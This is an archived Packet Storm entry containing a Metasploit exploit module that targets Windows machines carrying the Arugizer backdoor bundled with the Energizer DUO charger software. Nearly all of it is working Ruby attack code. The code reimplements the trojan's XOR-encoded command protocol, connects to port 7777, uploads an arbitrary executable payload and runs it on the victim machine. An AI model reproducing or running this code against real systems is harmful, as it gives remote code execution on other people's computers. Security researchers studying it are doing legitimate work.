Energizer DUO Trojan Code Execution

2010-03-09T00:00:00
ID PACKETSTORM:87042
Type packetstorm
Reporter H D Moore
Modified 2010-03-09T00:00:00

Description

                                        
                                            `##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Energizer DUO Trojan Code Execution',  
'Description' => %q{  
This module will execute an arbitrary payload against  
any system infected with the Arugizer trojan horse. This  
backdoor was shipped with the software package accompanying  
the Energizer Duo USB battery charger.  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8749 $',  
'References' =>  
[  
['CVE', '2010-0103'],  
['URL', 'http://www.kb.cert.org/vuls/id/154421']  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultTarget' => 0  
))  
  
  
register_options(  
[  
Opt::RPORT(7777),  
], self.class)  
end  
  
def trojan_encode(str)  
str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")  
end  
  
def trojan_command(cmd)  
cid = ""  
  
case cmd  
when :exec  
cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"  
when :dir  
cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"  
when :write  
cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"  
when :read  
cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"  
when :nop  
cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"  
when :find  
cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"  
when :yes  
cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"  
when :runonce  
cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"  
when :delete  
cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"  
end  
  
trojan_encode(  
[cid.length + 1].pack("V") + cid + "\x00"  
)  
end  
  
def exploit  
  
nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"  
exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"  
  
  
print_status("Trying to upload #{nam}...")  
connect  
  
# Write file request  
sock.put(trojan_command(:write))  
sock.put(trojan_encode([nam.length].pack("V")))  
sock.put(trojan_encode(nam))  
sock.put(trojan_encode([exe.length].pack("V")))  
sock.put(trojan_encode(exe))  
  
# Required to prevent the server from spinning a loop  
sock.put(trojan_command(:nop))  
  
disconnect  
  
#  
# Execute the payload  
#  
  
print_status("Trying to execute #{nam}...")  
  
connect  
  
# Execute file request  
sock.put(trojan_command(:exec))  
sock.put(trojan_encode([nam.length].pack("V")))  
sock.put(trojan_encode(nam))  
  
# Required to prevent the server from spinning a loop  
sock.put(trojan_command(:nop))  
  
disconnect  
end  
end  
  
`